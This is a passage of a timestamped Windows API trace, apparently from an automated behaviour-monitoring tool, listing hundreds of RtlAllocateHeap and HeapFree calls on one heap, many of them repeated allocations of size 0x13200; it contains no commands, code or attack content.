lpMem=0x5a88f0 | out: hHeap=0x590000) returned 1 [0098.340] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c17) returned 0x5c3710 [0098.341] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xe00) returned 0x5dd920 [0098.341] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x700) returned 0x5c5330 [0098.341] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c3710 | out: hHeap=0x590000) returned 1 [0098.341] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.341] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x153d) returned 0x5c3710 [0098.341] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dec00 | out: hHeap=0x590000) returned 1 [0098.341] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c5330 | out: hHeap=0x590000) returned 1 [0098.341] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2277) returned 0x5dd920 [0098.341] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1157) returned 0x5c4c60 [0098.342] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8a0) returned 0x5c5dc0 [0098.342] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.342] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c4c60 | out: hHeap=0x590000) returned 1 [0098.342] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1fc7) returned 0x5dd920 [0098.342] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c3710 | out: hHeap=0x590000) returned 1 [0098.342] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c5dc0 | out: hHeap=0x590000) returned 1 [0098.342] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1657) returned 0x5c3710 [0098.342] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xb20) returned 0x5c4d70 [0098.343] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x590) returned 0x5a88f0 [0098.343] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c3710 | out: hHeap=0x590000) returned 1 [0098.343] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c4d70 | out: hHeap=0x590000) returned 1 [0098.343] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2f96) returned 0x5c3710 [0098.343] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.343] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a88f0 | out: hHeap=0x590000) returned 1 [0098.343] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2b47) returned 0x5c66b0 [0098.343] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x15b7) returned 0x5dd920 [0098.343] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xad0) returned 0x5deee0 [0098.344] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c66b0 | out: hHeap=0x590000) returned 1 [0098.344] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.344] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5deee0 | out: hHeap=0x590000) returned 1 [0098.344] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2697) returned 0x5dd920 [0098.344] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1367) returned 0x5c66b0 [0098.344] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9a0) returned 0x5c7a20 [0098.345] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.345] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c66b0 | out: hHeap=0x590000) returned 1 [0098.345] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x474d) returned 0x5c83d0 [0098.345] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c3710 | out: hHeap=0x590000) returned 1 [0098.345] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c7a20 | out: hHeap=0x590000) returned 1 [0098.345] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x920) returned 0x5ccb30 [0098.345] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ccb30 | out: hHeap=0x590000) returned 1 [0098.345] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1b47) returned 0x5dd920 [0098.345] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xd90) returned 0x5ccb30 [0098.345] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x6d0) returned 0x5df470 [0098.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ccb30 | out: hHeap=0x590000) returned 1 [0098.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5df470 | out: hHeap=0x590000) returned 1 [0098.346] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5d0) returned 0x5a88f0 [0098.346] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x6adf) returned 0x5a93c0 [0098.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c83d0 | out: hHeap=0x590000) returned 1 [0098.347] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a88f0 | out: hHeap=0x590000) returned 1 [0098.347] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1887) returned 0x5dd920 [0098.347] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xc30) returned 0x5df1b0 [0098.347] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x620) returned 0x5a88f0 [0098.347] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.347] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5df1b0 | out: hHeap=0x590000) returned 1 [0098.347] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a88f0 | out: hHeap=0x590000) returned 1 [0098.347] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8f0) returned 0x5dd920 [0098.348] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x480) returned 0x5a88f0 [0098.348] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x240) returned 0x5de220 [0098.348] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.348] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a88f0 | out: hHeap=0x590000) returned 1 [0098.348] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5de220 | out: hHeap=0x590000) returned 1 [0098.348] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x5a04d0 [0098.348] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59b770 | out: hHeap=0x590000) returned 1 [0098.348] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bdb20 | out: hHeap=0x590000) returned 1 [0098.349] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93c0 | out: hHeap=0x590000) returned 1 [0098.349] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a04d0 | out: hHeap=0x590000) returned 1 [0098.349] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9900) returned 0x5a93c0 [0098.350] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1bf0) returned 0x5dd920 [0098.352] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.352] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9937) returned 0x5bdb20 [0098.353] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93c0 | out: hHeap=0x590000) returned 1 [0098.354] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x59b770 [0098.354] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9900) returned 0x5a93c0 [0098.354] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1bf0) returned 0x5dd920 [0098.356] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5dd920 | out: hHeap=0x590000) returned 1 [0098.356] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9937) returned 0x5dd920 [0098.356] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a93c0 | out: hHeap=0x590000) returned 1 [0098.356] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x40) returned 0x5a0160 [0098.356] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59b770 | out: hHeap=0x590000) returned 1 [0098.356] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b3770 | out: hHeap=0x590000) returned 1 [0098.357] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5cda20 | out: hHeap=0x590000) returned 1 [0098.357] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a0890 | out: hHeap=0x590000) returned 1 [0098.357] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x5a93c0 [0098.358] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x5c7460 [0098.358] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x8) returned 0x59ba60 [0098.358] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x5e7260 [0098.358] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9000 [0098.358] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59ba60 | out: hHeap=0x590000) returned 1 [0098.358] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x5fa470 [0098.359] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x18) returned 0x5a91e0 [0098.359] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a9000 | out: hHeap=0x590000) returned 1 [0098.359] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x60d680 [0098.359] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20) returned 0x59b230 [0098.361] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a91e0 | out: hHeap=0x590000) returned 1 [0098.361] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x620890 [0098.361] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x30) returned 0x5a8170 [0098.361] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59b230 | out: hHeap=0x590000) returned 1 [0098.361] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x633aa0 [0098.362] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x646cb0 [0098.362] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x48) returned 0x5a0d40 [0098.362] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8170 | out: hHeap=0x590000) returned 1 [0098.362] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x659ec0 [0098.363] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x66d0d0 [0098.363] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1eb0080 [0098.366] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x68) returned 0x598ca0 [0098.367] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a0d40 | out: hHeap=0x590000) returned 1 [0098.367] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1ec3290 [0098.367] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1ed64a0 [0098.367] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1ee96b0 [0098.368] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1efc8c0 [0098.368] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x98) returned 0x594c20 [0098.368] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x598ca0 | out: hHeap=0x590000) returned 1 [0098.368] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1f0fad0 [0098.369] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1f22ce0 [0098.370] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1f35ef0 [0098.370] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1f49100 [0098.370] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1f5c310 [0098.371] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1f6f520 [0098.371] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0xe0) returned 0x598ca0 [0098.371] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x594c20 | out: hHeap=0x590000) returned 1 [0098.371] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1f82730 [0098.372] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1fb0080 [0098.373] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1fc3290 [0098.373] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1fd64a0 [0098.374] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1fe96b0 [0098.374] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x1ffc8c0 [0098.375] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x200fad0 [0098.375] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2022ce0 [0098.376] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2035ef0 [0098.376] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x150) returned 0x59b050 [0098.376] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x598ca0 | out: hHeap=0x590000) returned 1 [0098.376] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2049100 [0098.376] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x205c310 [0098.377] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x206f520 [0098.377] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2082730 [0098.378] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2095940 [0098.378] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x20a8b50 [0098.378] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x20bbd60 [0098.695] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x20cef70 [0098.696] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x20e2180 [0098.697] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x20f5390 [0098.697] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x21085a0 [0098.697] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x211b7b0 [0098.698] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x212e9c0 [0098.698] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2141bd0 [0098.698] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1f8) returned 0x5a88f0 [0098.699] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59b050 | out: hHeap=0x590000) returned 1 [0098.699] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2154de0 [0098.699] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2167ff0 [0098.700] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x217b200 [0098.700] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x218e410 [0098.701] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x21b0080 [0098.701] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x21c3290 [0098.702] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x21d64a0 [0098.702] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x21e96b0 [0098.703] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x21fc8c0 [0098.703] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x220fad0 [0098.704] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2222ce0 [0098.704] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2235ef0 [0098.705] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2249100 [0098.705] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x225c310 [0098.705] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x226f520 [0098.706] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2282730 [0098.707] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2295940 [0098.707] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x22a8b50 [0098.707] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x22bbd60 [0098.709] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x22cef70 [0098.709] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x22e2180 [0098.710] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2f0) returned 0x5a8af0 [0098.710] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a88f0 | out: hHeap=0x590000) returned 1 [0098.710] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x22f5390 [0098.711] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x23085a0 [0098.711] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x231b7b0 [0098.711] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x232e9c0 [0098.712] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2341bd0 [0098.712] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2354de0 [0098.712] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2367ff0 [0098.713] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x237b200 [0098.713] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x238e410 [0098.714] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x23a1620 [0098.714] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x23b4830 [0098.715] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x23c7a40 [0098.715] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x23dac50 [0098.716] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x23ede60 [0098.717] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2401070 [0098.717] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2414280 [0098.718] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2427490 [0098.718] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x243a6a0 [0098.719] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x244d8b0 [0098.720] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2460ac0 [0098.720] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2473cd0 [0098.721] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2486ee0 [0098.721] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x249a0f0 [0098.722] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x24ad300 [0098.722] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x24c0510 [0098.722] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x24d3720 [0098.723] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x24e6930 [0098.723] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x24f9b40 [0098.723] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x250cd50 [0098.724] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x251ff60 [0098.724] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2533170 [0098.725] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x468) returned 0x5bc5d0 [0098.725] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a8af0 | out: hHeap=0x590000) returned 1 [0098.725] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2546380 [0098.725] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2559590 [0098.726] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x256c7a0 [0098.726] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x257f9b0 [0098.727] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2592bc0 [0098.727] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x25b0080 [0098.729] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x25c3290 [0098.729] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x25d64a0 [0098.730] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x25e96b0 [0098.730] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x25fc8c0 [0098.731] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x260fad0 [0098.731] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2622ce0 [0098.946] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2635ef0 [0098.947] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2649100 [0098.947] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x265c310 [0098.947] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x266f520 [0098.948] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2682730 [0098.948] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2695940 [0098.949] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x26a8b50 [0098.949] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x26bbd60 [0098.950] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x26cef70 [0098.950] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x26e2180 [0098.951] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x26f5390 [0098.951] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x27085a0 [0098.952] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x271b7b0 [0098.952] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x272e9c0 [0098.952] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2741bd0 [0098.952] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2754de0 [0098.953] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2767ff0 [0098.953] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x277b200 [0098.954] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x278e410 [0098.954] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x27a1620 [0098.955] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x27b4830 [0098.955] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x27c7a40 [0098.956] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x27dac50 [0098.956] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x27ede60 [0098.957] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2801070 [0098.957] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2814280 [0098.958] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2827490 [0098.958] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x283a6a0 [0098.959] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x284d8b0 [0098.959] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2860ac0 [0098.960] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2873cd0 [0098.960] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2886ee0 [0098.961] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x289a0f0 [0098.961] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x28ad300 [0098.961] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x28c0510 [0098.962] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x698) returned 0x5a88f0 [0098.962] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bc5d0 | out: hHeap=0x590000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x28d3720 [0098.962] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x28e6930 [0098.962] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x28f9b40 [0098.962] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x290cd50 [0098.963] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x291ff60 [0098.963] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2933170 [0098.964] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2946380 [0098.964] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2959590 [0098.964] RtlAllocateHeap 